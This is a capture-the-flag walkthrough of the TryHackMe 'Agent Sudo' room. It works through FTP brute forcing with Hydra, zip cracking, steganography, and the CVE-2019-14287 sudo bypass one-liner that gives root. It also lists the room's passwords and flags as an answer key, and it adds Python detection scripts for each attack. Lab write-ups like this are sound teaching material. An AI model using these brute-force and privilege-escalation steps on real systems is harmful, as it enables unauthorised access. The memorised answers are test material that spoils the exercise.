Agent Sudo — Walkthrough-TryHackMe

G N Vivekananda
7 min read · Jun 29, 2021

Visit https://tryhackme.com/room/agentsudoctf and join the room.

Attacker VPN IP: 10.9.227.16

Target IP: 10.10.25.88

This machine requires enumeration, hash cracking, steganography, and privilege escalation.

Enumerate

We start with an Nmap scan to find the open ports.

nmap -sS -sV -A -O -Pn 10.10.25.88

Ports 21, 22, and 80 are open on the machine. A web server is running on port 80, so let's open it and investigate further.

10.10.25.88

So the codename is probably a single letter, based on the signature, Agent R. We are told to use this codename as the user-agent.

Since we don't know the codename, I used Burp Suite's Intruder to intercept the request and fuzz the User-Agent header; curl works just as well.

From the results, we can see that letters R and C gave a different size response than other letters.

With User-agent: R, we have nothing interesting, just a warning that this incident will be reported.

With User-agent: C, we get redirected to /agent_C_attention.php, where we have a message:
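From the defender's side, the fuzzing described above leaves a distinctive trace in the web server log: a burst of requests from one client, each carrying a different one-letter User-Agent. The Python script below is an added example, not part of the original walkthrough or of the room; it parses constructed Apache combined-format lines (sample data, not real traffic) and flags any client that cycles through several abnormal User-Agent values inside a short window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of Apache "combined" log lines; the first client walks
# through one-letter User-Agents, the second is an ordinary browser session.
SAMPLE_LOG = """\
10.9.227.16 - - [29/Jun/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "A"
10.9.227.16 - - [29/Jun/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "B"
10.9.227.16 - - [29/Jun/2021:10:00:02 +0000] "GET / HTTP/1.1" 302 0 "-" "C"
10.9.227.16 - - [29/Jun/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 600 "-" "R"
10.9.227.16 - - [29/Jun/2021:10:00:03 +0000] "GET /agent_C_attention.php HTTP/1.1" 200 300 "-" "C"
192.0.2.10 - - [29/Jun/2021:10:05:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"
192.0.2.10 - - [29/Jun/2021:10:05:30 +0000] "GET /index.css HTTP/1.1" 200 120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"
"""

# Fields of the combined format: client, ident, user, timestamp, request,
# status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_suspicious_ua(ua):
    """Real browsers send a long multi-token UA; a bare token of a few
    characters (or an empty '-') is abnormal and worth counting."""
    return len(ua.strip()) <= 3


def detect_ua_fuzzing(log_text, min_distinct=3, window_seconds=60):
    """Flag clients that send at least `min_distinct` different suspicious
    User-Agents within `window_seconds`. Returns {ip: summary}."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_suspicious_ua(rec["ua"]):
            per_ip[rec["ip"]].append((rec["ts"], rec["ua"]))

    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # Sliding window anchored at each suspicious request.
            window = [ua for ts, ua in events[i:]
                      if (ts - start).total_seconds() <= window_seconds]
            if len(set(window)) >= min_distinct:
                flagged[ip] = {
                    "distinct_agents": sorted({ua for _, ua in events}),
                    "requests": len(events),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, info in detect_ua_fuzzing(SAMPLE_LOG).items():
        print(f"{ip}: {info['requests']} requests, agents {info['distinct_agents']}")
```

On the sample above the script reports the first client and its four distinct one-letter agents while the Firefox session stays quiet; the same logic, pointed at a real access log, gives an analyst the list of letters that were tried and, via the 302 on the "C" request, which one actually opened a hidden page.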

Now we have a username, Chris, who is said to have a weak password, so we can brute-force FTP with Hydra using either of the commands below to recover it.

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.25.88 -V -I

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.25.88 ftp

Login: chris

Password: crystal
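The Hydra run above produces a burst of failed logins for one username from one client in the FTP server's log. As an added example, not taken from the walkthrough or the room, the Python below scans constructed lines written in the style of vsftpd's log file and raises an alert when the failures for a (client, user) pair exceed a threshold inside a time window, noting whether a successful login followed the burst, which is the signature of a guessed weak password.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in vsftpd's log style (not a capture from the room):
# five rapid failures for "chris" followed by a success, then one ordinary
# mistyped password for "james" half an hour later.
SAMPLE_VSFTPD_LOG = """\
Tue Jun 29 10:00:01 2021 [pid 2011] [chris] FAIL LOGIN: Client "10.9.227.16"
Tue Jun 29 10:00:01 2021 [pid 2013] [chris] FAIL LOGIN: Client "10.9.227.16"
Tue Jun 29 10:00:02 2021 [pid 2015] [chris] FAIL LOGIN: Client "10.9.227.16"
Tue Jun 29 10:00:02 2021 [pid 2017] [chris] FAIL LOGIN: Client "10.9.227.16"
Tue Jun 29 10:00:03 2021 [pid 2019] [chris] FAIL LOGIN: Client "10.9.227.16"
Tue Jun 29 10:00:03 2021 [pid 2021] [chris] OK LOGIN: Client "10.9.227.16"
Tue Jun 29 10:30:00 2021 [pid 2101] [james] FAIL LOGIN: Client "192.0.2.20"
Tue Jun 29 10:31:00 2021 [pid 2103] [james] OK LOGIN: Client "192.0.2.20"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"$'
)


def parse_events(log_text):
    """Group login results by (client, user): {(client, user): [(ts, 'OK'|'FAIL')]}."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        attempts[(m["client"], m["user"])].append((ts, m["result"]))
    for events in attempts.values():
        events.sort()
    return attempts


def detect_ftp_bruteforce(log_text, threshold=5, window_seconds=60):
    """Alert on `threshold` or more FAIL LOGINs for one (client, user) within
    `window_seconds`; record whether an OK LOGIN came at or after the burst."""
    alerts = []
    for (client, user), events in parse_events(log_text).items():
        fails = [ts for ts, r in events if r == "FAIL"]
        for i, start in enumerate(fails):
            burst = [t for t in fails[i:] if (t - start).total_seconds() <= window_seconds]
            if len(burst) >= threshold:
                success = any(r == "OK" and ts >= burst[-1] for ts, r in events)
                alerts.append({
                    "client": client,
                    "user": user,
                    "failures": len(burst),
                    "followed_by_success": success,
                })
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for a in detect_ftp_bruteforce(SAMPLE_VSFTPD_LOG):
        print(a)
```

An alert whose `followed_by_success` is true is the one to act on first: it means the guessing stopped because a password worked, so that account's password needs to be reset and its subsequent FTP session reviewed.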

Now that we know the agent's password, we can log in through FTP.

ftp 10.10.25.88

Once logged in through FTP, we listed the directory and found three files: two images and a text file. We downloaded them with the get command.

Ok, let’s grab all the files to our local machine for further investigation:

ftp> mget *

Move to the directory holding the three files and check their types:

file *

cat To_agentJ.txt

Viewing To_agentJ.txt, the message concerns a login:

The password for chris is stored in the fake picture.

We tried Steghide to retrieve hidden data and ExifTool to inspect the metadata of cutie.png, but nothing came up (Steghide only handles JPEG, BMP, WAV and AU files, so a PNG was never going to give anything there). Trying to unzip it with unzip cutie.png gives an error: skipping: To_agentR.txt need PK compat. v5.1 (can do v4.6)

I used 7zip: 7z x cutie.png to try and extract it, but we get a password prompt.

Next we tried binwalk, which found a zip file embedded in cutie.png. We extracted it, but it was encrypted.

binwalk cutie.png

binwalk cutie.png -e

This gives an extracted folder containing the zip file 8702.zip.

We know the zip is encrypted, which is a bummer, but we can try to brute-force the password with John the Ripper. First, the zip file has to be converted into a hash format that JtR understands; zip2john does this, and then john cracks the hash.

zip2john 8702.zip > Output.txt

john Output.txt

John recovers the password alien. unzip still refused to extract the archive, so we used 7z instead:

7z e 8702.zip

entering alien at the password prompt.

cat To_agentR.txt

The quoted text, QXJlYTUx, looks like what we want, but it is encoded. This message is from Agent R. We decoded it with CyberChef, whose Magic operation auto-detects the encoding and identifies it as Base64.

Or you can decode it on the command line:

echo -n 'QXJlYTUx' | base64 -d

Area51

Now we have Area51. The only file left seems to be our jpg image. steghide is commonly used to hide data inside jpg files under a passphrase; maybe that is why one of the questions asks us for the steg password.

We can check whether the jpg hides something, and indeed it does, with the passphrase Area51:

steghide info cute-alien.jpg

Using this password to extract data from cute-alien.jpg:

steghide --extract -sf cute-alien.jpg

cat message.txt

hackerrules!

User Flag & Privilege Escalation

We log in to the machine over SSH with the username and password we found, and can then read the user flag.

ssh james@10.10.25.88

with password hackerrules!

Got the user flag

b03d975e8c92a7c04146cfa7a5a313c7

The other file in the home directory is an image, and we need to find out where it is from. Use the command below to download it from the machine, then run a reverse image search on Google:

scp james@10.10.25.88:Alien_autospy.jpg /home/

Privilege escalation

We check which commands the user may run with sudo using the sudo -l command.

It looks like our user is not allowed to run /bin/bash as root, because of the !root entry. However, the leading ALL means the user may run /bin/bash as any other user. This is interesting; perhaps there is a way to exploit it.

As luck would have it, a Google search turns up a vulnerability in sudo 1.8 that we might be able to use to gain root privileges, so we check the installed sudo version.

sudo -V

According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.

Our sudo version is lower than 1.8.28, so the machine is affected. Using the command from the advisory, we can indeed spawn a root shell and read the root flag.

sudo -u#-1 /bin/bash
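The two conditions the walkthrough checks by hand, a Runas list of the form (ALL, !root) and a sudo older than 1.8.28, can be audited mechanically on the defender's side. The Python below is an added example, not code from this walkthrough or from the sudo project; it parses a constructed sudoers excerpt (the rule for james is assumed to match the room's, which the post does not print) and reports every rule that grants ALL as the Runas user while trying to exclude specific users with "!", then combines that with the version line printed by sudo -V. The remediation is to upgrade past 1.8.28 and to replace ALL-with-exclusions by an explicit allow-list of target users, since "!" exclusions in sudoers are not a reliable security boundary.

```python
import re

# Constructed sudoers excerpt; only the james line is modelled on the room.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL, !root) /bin/bash
backup  ALL=(www-data) NOPASSWD: /usr/bin/rsync
ops     ALL=(ALL) /usr/bin/systemctl
"""

# user  host=(runas_users[:runas_groups]) [TAG:] commands
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$')


def parse_runas(spec):
    """Split the user half of a Runas_Spec such as 'ALL, !root' or 'ALL:ALL'
    into (allowed, excluded) sets; the optional group half after ':' is ignored."""
    user_part = spec.split(":", 1)[0]
    allow, deny = set(), set()
    for tok in (t.strip() for t in user_part.split(",")):
        if not tok:
            continue
        (deny if tok.startswith("!") else allow).add(tok.lstrip("!"))
    return allow, deny


def find_negated_runas_rules(sudoers_text):
    """Return rules whose Runas list is ALL minus some excluded users.
    That is the exact shape CVE-2019-14287 turns into 'run as root'."""
    findings = []
    for line in sudoers_text.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        allow, deny = parse_runas(m["runas"])
        if "ALL" in allow and deny:
            findings.append({
                "user": m["who"],
                "denied": sorted(deny),
                "cmds": m["cmds"].strip(),
            })
    return findings


def parse_version(version_line):
    """'Sudo version 1.8.21p2' -> (1, 8, 21); the 'pN' patch level is dropped
    because the fix boundary is the 1.8.28 release itself."""
    return tuple(int(x) for x in re.findall(r"\d+", version_line)[:3])


def vulnerable_to_cve_2019_14287(version_line, rules):
    """Exploitable only when both conditions hold: old sudo AND a rule that
    relies on '!' exclusion under a Runas ALL."""
    return parse_version(version_line) < (1, 8, 28) and bool(rules)


def suggested_fix(rule):
    """Rewrite an ALL-with-exclusions rule as an explicit allow-list placeholder."""
    return f"{rule['user']} ALL=(<list the intended target users here>) {rule['cmds']}"


if __name__ == "__main__":
    hits = find_negated_runas_rules(SAMPLE_SUDOERS)
    version = "Sudo version 1.8.21p2"  # constructed; read the real one from `sudo -V`
    for r in hits:
        print(f"{r['user']}: Runas ALL excluding {r['denied']} for {r['cmds']}")
        print("  suggested:", suggested_fix(r))
    print("vulnerable:", vulnerable_to_cve_2019_14287(version, hits))
```

The version check and the rule check are deliberately separate: a patched sudo makes the bug unexploitable, but the (ALL, !root) rule is still a misconfiguration worth fixing, because sudo's own manual warns that subtracting entries from ALL with "!" does not reliably restrict what a user can do.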

We are root now!

cd /root

ls

cat root.txt

b53a02f55b57d4439e3341834d70c062

Done! Let's go through the answers to the challenge questions now.

Task 2 Enumerate

Enumerate the machine and get all the important information

Answer the questions below

How many open ports?

3

How you redirect yourself to a secret page?

User-agent

What is the agent name?

chris

Task 3 Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

Answer the questions below

FTP password

crystal

Zip file password

alien

steg password

Area51

Who is the other agent (in full name)?

james

SSH password

hackerrules!

Task 4 Capture the user flag

You know the drill.

Answer the questions below

What is the user flag?

b03d975e8c92a7c04146cfa7a5a313c7

What is the incident of the photo called?

Roswell alien autopsy

Task 5 Privilege escalation

Enough with the extraordinary stuff? Time to get real.

Answer the questions below

CVE number for the escalation (Format: CVE-xxxx-xxxx)

CVE-2019-14287

What is the root flag?

b53a02f55b57d4439e3341834d70c062

(Bonus) Who is Agent R?

DesKel

Thank you very much for reading. As I always mention in every blog, suggestions are always welcome, and I am open to discussing other methods of completing the same task. I hope you find this useful, and if there is something you would like to add or any suggestions, you can contact me anytime.
